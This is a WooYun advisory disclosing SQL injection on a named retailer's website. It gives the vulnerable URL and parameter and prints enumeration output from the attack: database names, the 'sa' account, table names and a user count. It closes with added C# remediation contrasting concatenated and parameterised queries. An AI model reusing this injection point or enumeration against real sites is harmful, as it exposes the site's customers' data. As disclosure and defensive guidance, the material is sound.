Vulnerability summary
Defect ID: wooyun-2014-058940
Title: SQL injection on the 家隆名妆 main site
Vendor: 家隆名妆
Author: 手榴弹
Submitted: 2014-04-30 15:09
Fix deadline: 2014-06-14 15:10
Published: 2014-06-14 15:10
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be reached, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-04-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2014-06-14: Vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
SQL injection on the 家隆名妆 main site
Detailed description:
Injection point: http://www.jlmz.com.cn/detail/GoodDetail.aspx?goods_ID=34142&actPrice=aib.oo
Error-based injection
OS: Windows 2003
Web server: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
Database type: Microsoft SQL Server 2005
Databases:
AnalysisWebLog
bp_mng
Calon
co_mng
DataBak
DataNew
eDRP
eFile
eLB
hnmry
jl_shop
jlDev
jlmz_DB
jlmzserves
jlserves
master
model
msdb
ReportServer
ReportServerTempDB
S3MEI
tempdb
yoyoNew
Usernames:
jlmzdb
sa
Proof of vulnerability:
Tables:
CLmenus
CLpurgppur
CLpurgppur
CLpurviews
CLuserMenus
CLuserspurgp
CLuserspurgp
CLuserspurgp
TB_Test_ANSWER_Detail
TB_Test_Answer_User_detail
TB_Test_Answer_User_detail
TB_Test_OPTIONS
TB_Test_QUESTION
TB_Test_RELEASE
TB_Test_SURVEY
TB_Test_StyleTemplate
Tb_Test_Member_config
Tb_Test_Member_config
ViewActBuyMore
ViewActGoodsDetailsGoWhere
ViewActGoodsDetailsGoWhere
ViewActGoodsDetailsOnAmount
ViewAlcByRoleId
ViewAlcByRoleId
ViewMenuByRoleId
ViewMenuByRoleId
ViewMenuByUserNo
ViewOrderHadAndUsers
ViewPermissions
ViewRoleAlc
ViewRoleAlc
ViewRoleMenuByCondition
ViewRoleMenuByCondition
ViewRoleUser
ViewSpecialGoods
ViewUser
ViewWareStandGroup
View_ActBuyMoreByAct_ID
View_ActivitesAndGoods1
View_GoodsCommentList
View_GoodsCommentList
View_GoodsCommentList
View_OrderBackApply
View_OrderHad
View_UserAndOrderHad
View_rbac_user
WantOnWeb
WareStandardGroupWare
tb_PT_DeductPoint(??)
rbac_tb_alc
rbac_tb_menu
rbac_tb_role_alc
rbac_tb_role_alc
rbac_tb_role_menu
rbac_tb_role_secuser
rbac_tb_secuser
shops
sysParas
sysdiagrams
tb_BG_OrderHad
tb_BG_OrderListDta
tb_BG_OrderUntionListDta
tb_GS_Comment
tb_GS_Goods_BAK20111205
tb_GS_Goods_BAK20111205
tb_GS_Goods_UnionDetial_TimeHistory
tb_GS_PackingInfo
tb_GS_ViewRecord
tb_GT_Brand
tb_GT_GoodsType
tb_GT_Series
tb_Goods_GoodType
tb_Gs_GoodsGroup
tb_Gs_Goods_Union_Detail
tb_PT_GainPoint_History
tb_PT_GainPoint_History
tb_PT_PointDateScope
tb_PT_pointshop
tb_Sys_BackServiceCheckReport
tb_Sys_Config
tb_Sys_Coupon
tb_Sys_LoginLog
tb_Sys_PeriodicalsMail
tb_Sys_Sequence
tb_Sys_mailTemplate
tb_UP_Grade
tb_UP_MessageAnswer
tb_UP_MessageAnswer
tb_UP_MyFavorites
tb_UP_Note
tb_UP_UserAddresses
tb_UP_UserCoupon
tb_UP_UserFriends
tb_UP_UserGiftCard
tb_UP_Users
tb_WB_AdvImg
tb_WB_Class
tb_WB_CommentGrade
tb_WB_MagazineDta_History
tb_WB_MagazineDta_History
tb_WB_MagazineDta_History
tb_WB_News_Articles
tb_WB_Position
tb_WB_Type
tb_hd_ActivityGood_dta_dta
tb_hd_ActivityGood_dta_dta
tb_hd_PpecialGoodsDta
tb_hd_activities_good1
tb_hd_activities_good1
tb_hd_activities_good2
tb_hd_activityScoreDetail
tb_hd_logisticsCharge
tb_pt_UserInformationScore
tb_public_Web_Article
tb_public_Web_ArticleType
tb_public_Web_CustImage
tb_public_Web_Keyword
tb_public_Web_Menu
tb_public_seo_key
tb_public_web_dictionary
tb_seo_Key
tb_sys_MenuConfig
tb_sys_bank
tb_sys_logistics
tb_sys_searchKeyWords
tb_up_OrderBackApplyDta
tb_up_OrderBackApplyDta
tb_up_OrderCashRecord
tb_up_ShoppingCart
tb_up_UserInformationScore
tb_up_UserIntroGoods
tb_up_UserInviteFriend
tb_wb_UserBrowseGood
view_GetListOnYouSearch
view_UserInfoMationScore_Users
view_salesReport
User count:
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| dbo.tb_UP_Users | 57495   |
+-----------------+---------+
Fix recommendation:
Filter (sanitize) the input.
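The report's fix advice is a single word, "filter". For an ASP.NET 2.0 page on SQL Server like the one described, the durable fix is to validate the type of `goods_ID` at the request boundary and bind it as a typed parameter, not to strip characters. The following is an added example written for this page; it is not code from the report or from the vendor's site. The table and column names (`tb_GS_Goods`, `goods_name`, `price`) and the method names are assumptions for illustration; only the `goods_ID` parameter and the `tb_UP_Users` table appear in the report.

```csharp
// Added example (not from the original report). Demonstrates the vulnerable
// string-concatenation pattern next to a parameterised ADO.NET query for the
// goods_ID request parameter on an ASP.NET 2.0 / SQL Server 2005 stack.
// tb_GS_Goods, goods_name and price are assumed names for illustration.
using System;
using System.Data;
using System.Data.SqlClient;

public static class GoodsRepository
{
    // Vulnerable pattern: the raw query-string value becomes part of the SQL
    // text, so the query logic and any SQL Server error message it triggers
    // are controlled by the client. This is the shape error-based injection
    // relies on; it is shown only as the "before" of the fix.
    public static string BuildQueryUnsafe(string goodsIdRaw)
    {
        return "SELECT goods_name, price FROM tb_GS_Goods WHERE goods_ID = " + goodsIdRaw;
    }

    // Hardened version: enforce the expected type first, then bind the value
    // as an Int parameter so the driver never treats it as SQL.
    public static DataTable GetGoodsDetail(string connectionString, string goodsIdRaw)
    {
        int goodsId;
        if (!int.TryParse(goodsIdRaw, out goodsId) || goodsId <= 0)
        {
            // A numeric id has no legitimate non-numeric form, so reject
            // outright instead of trying to "filter" the string.
            throw new ArgumentException("goods_ID must be a positive integer");
        }

        const string sql =
            "SELECT goods_name, price FROM tb_GS_Goods WHERE goods_ID = @goods_ID";

        var result = new DataTable();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@goods_ID", SqlDbType.Int).Value = goodsId;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                result.Load(reader);
            }
        }
        return result;
    }
}
```

Two configuration points follow from the report itself. The injection was error-based, so the application should stop returning database error text to clients: set `<customErrors mode="On" />` in web.config so SQL Server messages are replaced by a generic page. The report also lists `sa` among the usernames; the site's connection string should use a dedicated login with only the rights the page needs, so that a future injection cannot reach other databases on the same instance.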
Copyright notice: please credit the source when reposting: 手榴弹@乌云
Vulnerability response
Vendor response:
Vendor could not be reached, or vendor actively declined
